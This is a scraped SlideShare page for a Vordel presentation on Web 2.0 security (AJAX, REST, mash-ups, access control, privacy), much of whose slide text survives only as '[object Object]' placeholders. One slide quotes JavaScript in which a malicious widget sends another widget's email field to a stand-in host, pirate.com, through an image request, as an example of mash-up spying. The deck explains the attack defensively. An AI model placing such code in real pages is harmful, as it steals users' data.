SlideShare ist ein Scribd-Unternehmen logo

Web 20 Security - Vordel

Als PPT, PDF herunterladen
G
guest2a1135

Web 2.0 applications involve increased security risks due to their use of asynchronous JavaScript and XML (AJAX) to dynamically update pages. Key security considerations for Web 2.0 include access control, integrity, availability, and privacy/confidentiality. Developers must validate all user-supplied data to prevent attacks like cross-site scripting, enforce access controls, and use encryption to protect private data transmitted in queries.

Technologie
1 von 34
Web 2.0 and Security Richard Mooney - Product Manager - Vordel
Web 2.0 and Security ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Security Basics ,[object Object],[object Object],[object Object],[object Object]
What is Web 2.0? ,[object Object],[object Object],[object Object],[object Object],[object Object]
Web 2.0 Architecture
User Experience
How does it work? ,[object Object],[object Object]
Underlying Technologies: On the client side: Scripting the “XHR” // Kick off the XMLhttpRequest, set the callback xmlhttp = new XMLHttpRequest(); xmlhttp.open("GET", url, true); xmlhttp.onreadystatechange = doSomethingWithResponse; xmlhttp.send(null); // do something with the data fetched from the server function doSomethingWithResponse() { var xmlResponse = xmlhttp.responseXML; var message = xmlDocument.getElementsByTagName(‘message').item(0).firstChild.data; document.getElementById(‘message').value = message; }
Underlying Technologies: On the server side - REST-style Web Services ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Underlying Technologies: Invoking a Web 2.0 Web Service ,[object Object],[object Object]
Underlying Technologies: Combining Information Sources: Mash-ups ,[object Object],[object Object],[object Object],[object Object],[object Object]
Underlying Technologies: Windows Live Some mash-ups use server-side proxies to allow AJAX code to fetch data from multiple different domains Users can add “widgets” to the Windows Live dashboard
Access Control: Defintiion The ability to be able to control access to a service based on identity
Access Control: Basics ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Access Control: Data Harvesting Web 2.0 make use of Web Services on the server-side to send data asynchronously to the client. What if you forget about the client and write your own application to data-harvest all of the data off the server? Policies can be used to ensure that only authenticated users can access the back-end Web Services. Policies can also be used to protect against data harvesting
Access Control: Recommendation ,[object Object],[object Object],[object Object]
Integrity & Non Repudiation: Definition ,[object Object],[object Object],[object Object],[object Object]
Integrity: Maintaining Data, System & User Integrity ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Integrity: Who is your user ,[object Object],[object Object],[object Object],[object Object],How was this OpenID provisioned? Is there a way of physically tying it to an ID such as mailing it out to them? Is something like PKI the answer?
Integrity & Non Repudiation: Recommendation ,[object Object],[object Object]
Availabilty: Definition ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Availabilty: The Size of the attack surface ,[object Object],[object Object],[object Object],[object Object],[object Object]
Availability: XML Security and AJAX ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Availability: Filter inbound and outbound XML ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Availability: Securing the data sent in Web 2.0 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Availability: Recommendation ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Privacy & Confidentiality: Definition ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Privacy: JavaScript Vulnerabilities ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Privacy: Prototype Hijacking ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Privacy: Another technique for spying in a Mash-up Described by Anton Rager and Jeremiah Gossman - The malicious widget can simply view the innerHTML of other widgets on the same page, then hive off the data to a third-party server by appending it to an IMG tag: spyImage=document.createElement(‘img’); spyImage.src=‘http://www.pirate.com/sniff.html?” + document.getElementById(‘newEmail').value
Privacy: Information leakage in the audit trail ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Privacy: Code Injection & Cross-Site Scripting ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Privacy: Recommendation ,[object Object],[object Object],[object Object],[object Object]
Conclusions ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]

Empfohlen

Building secure applications with keycloak
Building secure applications with keycloak Building secure applications with keycloak
Building secure applications with keycloak Abhishek Koserwal
 
Keycloak for Science Gateways - SGCI Technology Sampler Webinar
Keycloak for Science Gateways - SGCI Technology Sampler WebinarKeycloak for Science Gateways - SGCI Technology Sampler Webinar
Keycloak for Science Gateways - SGCI Technology Sampler Webinarmarcuschristie
 
Draft: building secure applications with keycloak (oidc/jwt)
Draft: building secure applications with keycloak (oidc/jwt)Draft: building secure applications with keycloak (oidc/jwt)
Draft: building secure applications with keycloak (oidc/jwt)Abhishek Koserwal
 
Secure Spring Boot Microservices with Keycloak
Secure Spring Boot Microservices with KeycloakSecure Spring Boot Microservices with Keycloak
Secure Spring Boot Microservices with KeycloakRed Hat Developers
 
Identity management and single sign on - how much flexibility
Identity management and single sign on - how much flexibilityIdentity management and single sign on - how much flexibility
Identity management and single sign on - how much flexibilityRyan Dawson
 
Secure your app with keycloak
Secure your app with keycloakSecure your app with keycloak
Secure your app with keycloakGuy Marom
 
JWT SSO Inbound Authenticator
JWT SSO Inbound AuthenticatorJWT SSO Inbound Authenticator
JWT SSO Inbound AuthenticatorMifrazMurthaja
 
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...Hermann Burgmeier
 

Empfohlen

Building secure applications with keycloak
Building secure applications with keycloak Building secure applications with keycloak
Building secure applications with keycloak Abhishek Koserwal
 
Keycloak for Science Gateways - SGCI Technology Sampler Webinar
Keycloak for Science Gateways - SGCI Technology Sampler WebinarKeycloak for Science Gateways - SGCI Technology Sampler Webinar
Keycloak for Science Gateways - SGCI Technology Sampler Webinarmarcuschristie
 
Draft: building secure applications with keycloak (oidc/jwt)
Draft: building secure applications with keycloak (oidc/jwt)Draft: building secure applications with keycloak (oidc/jwt)
Draft: building secure applications with keycloak (oidc/jwt)Abhishek Koserwal
 
Secure Spring Boot Microservices with Keycloak
Secure Spring Boot Microservices with KeycloakSecure Spring Boot Microservices with Keycloak
Secure Spring Boot Microservices with KeycloakRed Hat Developers
 
Identity management and single sign on - how much flexibility
Identity management and single sign on - how much flexibilityIdentity management and single sign on - how much flexibility
Identity management and single sign on - how much flexibilityRyan Dawson
 
Secure your app with keycloak
Secure your app with keycloakSecure your app with keycloak
Secure your app with keycloakGuy Marom
 
JWT SSO Inbound Authenticator
JWT SSO Inbound AuthenticatorJWT SSO Inbound Authenticator
JWT SSO Inbound AuthenticatorMifrazMurthaja
 
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...Hermann Burgmeier
 
Foreman Single Sign-On Made Easy with Keycloak
Foreman Single Sign-On Made Easy with KeycloakForeman Single Sign-On Made Easy with Keycloak
Foreman Single Sign-On Made Easy with KeycloakNikhil Kathole
 
Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...
Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...
Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...Codemotion
 
JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2Rodrigo Cândido da Silva
 
Authorization and Authentication in Microservice Environments
Authorization and Authentication in Microservice EnvironmentsAuthorization and Authentication in Microservice Environments
Authorization and Authentication in Microservice EnvironmentsLeanIX GmbH
 
ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2Rodrigo Cândido da Silva
 
CIS14: Working with OAuth and OpenID Connect
CIS14: Working with OAuth and OpenID ConnectCIS14: Working with OAuth and OpenID Connect
CIS14: Working with OAuth and OpenID ConnectCloudIDSummit
 
Presentation
PresentationPresentation
PresentationLaxman Kumar
 
Mit 2014 introduction to open id connect and o-auth 2
Mit 2014 introduction to open id connect and o-auth 2Mit 2014 introduction to open id connect and o-auth 2
Mit 2014 introduction to open id connect and o-auth 2Justin Richer
 
GSoC Mideterm-OAuth2 Module
GSoC Mideterm-OAuth2 ModuleGSoC Mideterm-OAuth2 Module
GSoC Mideterm-OAuth2 ModuleMayank Sharma
 
Microservices Manchester: Authentication in Microservice Systems by David Borsos
Microservices Manchester: Authentication in Microservice Systems by David BorsosMicroservices Manchester: Authentication in Microservice Systems by David Borsos
Microservices Manchester: Authentication in Microservice Systems by David BorsosOpenCredo
 
OpenID vs OAuth - Identity on the Web
OpenID vs OAuth - Identity on the WebOpenID vs OAuth - Identity on the Web
OpenID vs OAuth - Identity on the WebRichard Metzler
 
Understanding OpenID
Understanding OpenIDUnderstanding OpenID
Understanding OpenIDPrabath Siriwardena
 
Introduction to PicketLink
Introduction to PicketLinkIntroduction to PicketLink
Introduction to PicketLinkJBUG London
 
WSO2 Identity Server - Product Overview
WSO2 Identity Server - Product OverviewWSO2 Identity Server - Product Overview
WSO2 Identity Server - Product OverviewWSO2
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB
 
Web API 2 Token Based Authentication
Web API 2 Token Based AuthenticationWeb API 2 Token Based Authentication
Web API 2 Token Based Authenticationjeremysbrown
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST securityIgor Bossenko
 
Security enforcement of Java Microservices with Apiman & Keycloak
Security enforcement of Java Microservices with Apiman & KeycloakSecurity enforcement of Java Microservices with Apiman & Keycloak
Security enforcement of Java Microservices with Apiman & KeycloakCharles Moulliard
 
REST API Security: OAuth 2.0, JWTs, and More!
REST API Security: OAuth 2.0, JWTs, and More!REST API Security: OAuth 2.0, JWTs, and More!
REST API Security: OAuth 2.0, JWTs, and More!Stormpath
 
Secure Webservices
Secure WebservicesSecure Webservices
Secure WebservicesMatthias Käppler
 
A Babel Fish from the Swamp of POX
A Babel Fish from the Swamp of POXA Babel Fish from the Swamp of POX
A Babel Fish from the Swamp of POXRoss Garrett
 
Apps world 2014 - APIs A State of the Union
Apps world 2014 - APIs A State of the UnionApps world 2014 - APIs A State of the Union
Apps world 2014 - APIs A State of the UnionRoss Garrett
 

Weitere ähnliche Inhalte

Was ist angesagt?

Foreman Single Sign-On Made Easy with Keycloak
Foreman Single Sign-On Made Easy with KeycloakForeman Single Sign-On Made Easy with Keycloak
Foreman Single Sign-On Made Easy with KeycloakNikhil Kathole
 
Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...
Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...
Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...Codemotion
 
JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2Rodrigo Cândido da Silva
 
Authorization and Authentication in Microservice Environments
Authorization and Authentication in Microservice EnvironmentsAuthorization and Authentication in Microservice Environments
Authorization and Authentication in Microservice EnvironmentsLeanIX GmbH
 
ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2Rodrigo Cândido da Silva
 
CIS14: Working with OAuth and OpenID Connect
CIS14: Working with OAuth and OpenID ConnectCIS14: Working with OAuth and OpenID Connect
CIS14: Working with OAuth and OpenID ConnectCloudIDSummit
 
Mit 2014 introduction to open id connect and o-auth 2
Mit 2014 introduction to open id connect and o-auth 2Mit 2014 introduction to open id connect and o-auth 2
Mit 2014 introduction to open id connect and o-auth 2Justin Richer
 
GSoC Mideterm-OAuth2 Module
GSoC Mideterm-OAuth2 ModuleGSoC Mideterm-OAuth2 Module
GSoC Mideterm-OAuth2 ModuleMayank Sharma
 
Microservices Manchester: Authentication in Microservice Systems by David Borsos
Microservices Manchester: Authentication in Microservice Systems by David BorsosMicroservices Manchester: Authentication in Microservice Systems by David Borsos
Microservices Manchester: Authentication in Microservice Systems by David BorsosOpenCredo
 
OpenID vs OAuth - Identity on the Web
OpenID vs OAuth - Identity on the WebOpenID vs OAuth - Identity on the Web
OpenID vs OAuth - Identity on the WebRichard Metzler
 
Introduction to PicketLink
Introduction to PicketLinkIntroduction to PicketLink
Introduction to PicketLinkJBUG London
 
WSO2 Identity Server - Product Overview
WSO2 Identity Server - Product OverviewWSO2 Identity Server - Product Overview
WSO2 Identity Server - Product OverviewWSO2
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB
 
Web API 2 Token Based Authentication
Web API 2 Token Based AuthenticationWeb API 2 Token Based Authentication
Web API 2 Token Based Authenticationjeremysbrown
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST securityIgor Bossenko
 
Security enforcement of Java Microservices with Apiman & Keycloak
Security enforcement of Java Microservices with Apiman & KeycloakSecurity enforcement of Java Microservices with Apiman & Keycloak
Security enforcement of Java Microservices with Apiman & KeycloakCharles Moulliard
 
REST API Security: OAuth 2.0, JWTs, and More!
REST API Security: OAuth 2.0, JWTs, and More!REST API Security: OAuth 2.0, JWTs, and More!
REST API Security: OAuth 2.0, JWTs, and More!Stormpath
 

Was ist angesagt? (20)

Foreman Single Sign-On Made Easy with Keycloak
Foreman Single Sign-On Made Easy with KeycloakForeman Single Sign-On Made Easy with Keycloak
Foreman Single Sign-On Made Easy with Keycloak
 
Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...
Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...
Securing your apps with OAuth2 and OpenID Connect - Roland Guijt - Codemotion...
 
JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2
 
Authorization and Authentication in Microservice Environments
Authorization and Authentication in Microservice EnvironmentsAuthorization and Authentication in Microservice Environments
Authorization and Authentication in Microservice Environments
 
ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2
 
CIS14: Working with OAuth and OpenID Connect
CIS14: Working with OAuth and OpenID ConnectCIS14: Working with OAuth and OpenID Connect
CIS14: Working with OAuth and OpenID Connect
 
Presentation
PresentationPresentation
Presentation
 
Mit 2014 introduction to open id connect and o-auth 2
Mit 2014 introduction to open id connect and o-auth 2Mit 2014 introduction to open id connect and o-auth 2
Mit 2014 introduction to open id connect and o-auth 2
 
GSoC Mideterm-OAuth2 Module
GSoC Mideterm-OAuth2 ModuleGSoC Mideterm-OAuth2 Module
GSoC Mideterm-OAuth2 Module
 
Microservices Manchester: Authentication in Microservice Systems by David Borsos
Microservices Manchester: Authentication in Microservice Systems by David BorsosMicroservices Manchester: Authentication in Microservice Systems by David Borsos
Microservices Manchester: Authentication in Microservice Systems by David Borsos
 
OpenID vs OAuth - Identity on the Web
OpenID vs OAuth - Identity on the WebOpenID vs OAuth - Identity on the Web
OpenID vs OAuth - Identity on the Web
 
Understanding OpenID
Understanding OpenIDUnderstanding OpenID
Understanding OpenID
 
Introduction to PicketLink
Introduction to PicketLinkIntroduction to PicketLink
Introduction to PicketLink
 
WSO2 Identity Server - Product Overview
WSO2 Identity Server - Product OverviewWSO2 Identity Server - Product Overview
WSO2 Identity Server - Product Overview
 
MongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDBMongoDB.local Atlanta: Introduction to Serverless MongoDB
MongoDB.local Atlanta: Introduction to Serverless MongoDB
 
Web API 2 Token Based Authentication
Web API 2 Token Based AuthenticationWeb API 2 Token Based Authentication
Web API 2 Token Based Authentication
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
 
Security enforcement of Java Microservices with Apiman & Keycloak
Security enforcement of Java Microservices with Apiman & KeycloakSecurity enforcement of Java Microservices with Apiman & Keycloak
Security enforcement of Java Microservices with Apiman & Keycloak
 
REST API Security: OAuth 2.0, JWTs, and More!
REST API Security: OAuth 2.0, JWTs, and More!REST API Security: OAuth 2.0, JWTs, and More!
REST API Security: OAuth 2.0, JWTs, and More!
 
Secure Webservices
Secure WebservicesSecure Webservices
Secure Webservices
 

Andere mochten auch

A Babel Fish from the Swamp of POX
A Babel Fish from the Swamp of POXA Babel Fish from the Swamp of POX
A Babel Fish from the Swamp of POXRoss Garrett
 
Apps world 2014 - APIs A State of the Union
Apps world 2014 - APIs A State of the UnionApps world 2014 - APIs A State of the Union
Apps world 2014 - APIs A State of the UnionRoss Garrett
 
IDC Finans Teknoloji Konferansı, İstanbul
IDC Finans Teknoloji Konferansı, İstanbulIDC Finans Teknoloji Konferansı, İstanbul
IDC Finans Teknoloji Konferansı, İstanbulHakan ARIBAS
 
Mobile Web and Apps World New Orleans- Session 9 Vordel Mobile APIManagement
Mobile Web and Apps World New Orleans- Session 9 Vordel Mobile APIManagementMobile Web and Apps World New Orleans- Session 9 Vordel Mobile APIManagement
Mobile Web and Apps World New Orleans- Session 9 Vordel Mobile APIManagementNextVision Media
 
Axway Managed Services for Exchange and Integration Platform
Axway Managed Services for Exchange and Integration PlatformAxway Managed Services for Exchange and Integration Platform
Axway Managed Services for Exchange and Integration PlatformJean-Claude Bellando
 
Monitor your car from the cloud! DIY Telematics and the Internet of Things
Monitor your car from the cloud! DIY Telematics and the Internet of ThingsMonitor your car from the cloud! DIY Telematics and the Internet of Things
Monitor your car from the cloud! DIY Telematics and the Internet of ThingsTom Gersic
 
Examining BMW´s Open Architecture for Telematic Applications - H Michel
Examining BMW´s Open Architecture for Telematic Applications - H MichelExamining BMW´s Open Architecture for Telematic Applications - H Michel
Examining BMW´s Open Architecture for Telematic Applications - H Michelmfrancis
 
How to Choose the Right API Management Solution
How to Choose the Right API Management SolutionHow to Choose the Right API Management Solution
How to Choose the Right API Management SolutionCA API Management
 
Open API and API Management - Introduction and Comparison of Products: TIBCO ...
Open API and API Management - Introduction and Comparison of Products: TIBCO ...Open API and API Management - Introduction and Comparison of Products: TIBCO ...
Open API and API Management - Introduction and Comparison of Products: TIBCO ...Kai Wähner
 
A.T. Kearney: Positioning for the Telematics Tipping Point
A.T. Kearney: Positioning for the Telematics Tipping PointA.T. Kearney: Positioning for the Telematics Tipping Point
A.T. Kearney: Positioning for the Telematics Tipping PointbengillTU
 
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-on
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-onFast and Free SSO: A Survey of Open-Source Solutions to Single Sign-on
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-onCraig Dickson
 
API Business Models
API Business ModelsAPI Business Models
API Business ModelsJohn Musser
 

Andere mochten auch (12)

A Babel Fish from the Swamp of POX
A Babel Fish from the Swamp of POXA Babel Fish from the Swamp of POX
A Babel Fish from the Swamp of POX
 
Apps world 2014 - APIs A State of the Union
Apps world 2014 - APIs A State of the UnionApps world 2014 - APIs A State of the Union
Apps world 2014 - APIs A State of the Union
 
IDC Finans Teknoloji Konferansı, İstanbul
IDC Finans Teknoloji Konferansı, İstanbulIDC Finans Teknoloji Konferansı, İstanbul
IDC Finans Teknoloji Konferansı, İstanbul
 
Mobile Web and Apps World New Orleans- Session 9 Vordel Mobile APIManagement
Mobile Web and Apps World New Orleans- Session 9 Vordel Mobile APIManagementMobile Web and Apps World New Orleans- Session 9 Vordel Mobile APIManagement
Mobile Web and Apps World New Orleans- Session 9 Vordel Mobile APIManagement
 
Axway Managed Services for Exchange and Integration Platform
Axway Managed Services for Exchange and Integration PlatformAxway Managed Services for Exchange and Integration Platform
Axway Managed Services for Exchange and Integration Platform
 
Monitor your car from the cloud! DIY Telematics and the Internet of Things
Monitor your car from the cloud! DIY Telematics and the Internet of ThingsMonitor your car from the cloud! DIY Telematics and the Internet of Things
Monitor your car from the cloud! DIY Telematics and the Internet of Things
 
Examining BMW´s Open Architecture for Telematic Applications - H Michel
Examining BMW´s Open Architecture for Telematic Applications - H MichelExamining BMW´s Open Architecture for Telematic Applications - H Michel
Examining BMW´s Open Architecture for Telematic Applications - H Michel
 
How to Choose the Right API Management Solution
How to Choose the Right API Management SolutionHow to Choose the Right API Management Solution
How to Choose the Right API Management Solution
 
Open API and API Management - Introduction and Comparison of Products: TIBCO ...
Open API and API Management - Introduction and Comparison of Products: TIBCO ...Open API and API Management - Introduction and Comparison of Products: TIBCO ...
Open API and API Management - Introduction and Comparison of Products: TIBCO ...
 
A.T. Kearney: Positioning for the Telematics Tipping Point
A.T. Kearney: Positioning for the Telematics Tipping PointA.T. Kearney: Positioning for the Telematics Tipping Point
A.T. Kearney: Positioning for the Telematics Tipping Point
 
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-on
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-onFast and Free SSO: A Survey of Open-Source Solutions to Single Sign-on
Fast and Free SSO: A Survey of Open-Source Solutions to Single Sign-on
 
API Business Models
API Business ModelsAPI Business Models
API Business Models
 

Ähnlich wie Web 20 Security - Vordel

Secure development
Secure developmentSecure development
Secure developmentAhmed Gamil
 
Www architecture,cgi, client server security, protection
Www architecture,cgi, client server security, protectionWww architecture,cgi, client server security, protection
Www architecture,cgi, client server security, protectionAustina Francis
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
Bluedog white paper - Our WebObjects Web Security Model
Bluedog white paper - Our WebObjects Web Security ModelBluedog white paper - Our WebObjects Web Security Model
Bluedog white paper - Our WebObjects Web Security Modeltom termini
 
Presentation On CLoudSweeper By Harini Anand
Presentation On CLoudSweeper By Harini AnandPresentation On CLoudSweeper By Harini Anand
Presentation On CLoudSweeper By Harini AnandHarini Anandakumar
 
Palo Alto Networks: Protection for Security & Compliance
Palo Alto Networks: Protection for Security & CompliancePalo Alto Networks: Protection for Security & Compliance
Palo Alto Networks: Protection for Security & ComplianceAmazon Web Services
 
Application Security
Application SecurityApplication Security
Application Securitynirola
 
Single Sign-On security issue in Cloud Computing
Single Sign-On security issue in Cloud ComputingSingle Sign-On security issue in Cloud Computing
Single Sign-On security issue in Cloud ComputingRahul Roshan
 
Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site SecuritySteven Cahill
 
Rest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API SecurityRest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API SecurityMohammed Fazuluddin
 
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud appsSecurity in the cloud protecting your cloud apps
Security in the cloud protecting your cloud appsCenzic
 
MongoDB World 2019: Securing Application Data from Day One
MongoDB World 2019: Securing Application Data from Day OneMongoDB World 2019: Securing Application Data from Day One
MongoDB World 2019: Securing Application Data from Day OneMongoDB
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 

Ähnlich wie Web 20 Security - Vordel (20)

API security
API securityAPI security
API security
 
Secure development
Secure developmentSecure development
Secure development
 
Www architecture,cgi, client server security, protection
Www architecture,cgi, client server security, protectionWww architecture,cgi, client server security, protection
Www architecture,cgi, client server security, protection
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
Bluedog white paper - Our WebObjects Web Security Model
Bluedog white paper - Our WebObjects Web Security ModelBluedog white paper - Our WebObjects Web Security Model
Bluedog white paper - Our WebObjects Web Security Model
 
Presentation On CLoudSweeper By Harini Anand
Presentation On CLoudSweeper By Harini AnandPresentation On CLoudSweeper By Harini Anand
Presentation On CLoudSweeper By Harini Anand
 
Palo Alto Networks: Protection for Security & Compliance
Palo Alto Networks: Protection for Security & CompliancePalo Alto Networks: Protection for Security & Compliance
Palo Alto Networks: Protection for Security & Compliance
 
Application Security
Application SecurityApplication Security
Application Security
 
Single Sign-On security issue in Cloud Computing
Single Sign-On security issue in Cloud ComputingSingle Sign-On security issue in Cloud Computing
Single Sign-On security issue in Cloud Computing
 
Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site Security
 
Rest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API SecurityRest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API Security
 
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud appsSecurity in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
 
SCWCD : Secure web
SCWCD : Secure webSCWCD : Secure web
SCWCD : Secure web
 
SCWCD : Secure web : CHAP : 7
SCWCD : Secure web : CHAP : 7SCWCD : Secure web : CHAP : 7
SCWCD : Secure web : CHAP : 7
 
MongoDB World 2019: Securing Application Data from Day One
MongoDB World 2019: Securing Application Data from Day OneMongoDB World 2019: Securing Application Data from Day One
MongoDB World 2019: Securing Application Data from Day One
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 

Kürzlich hochgeladen

A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
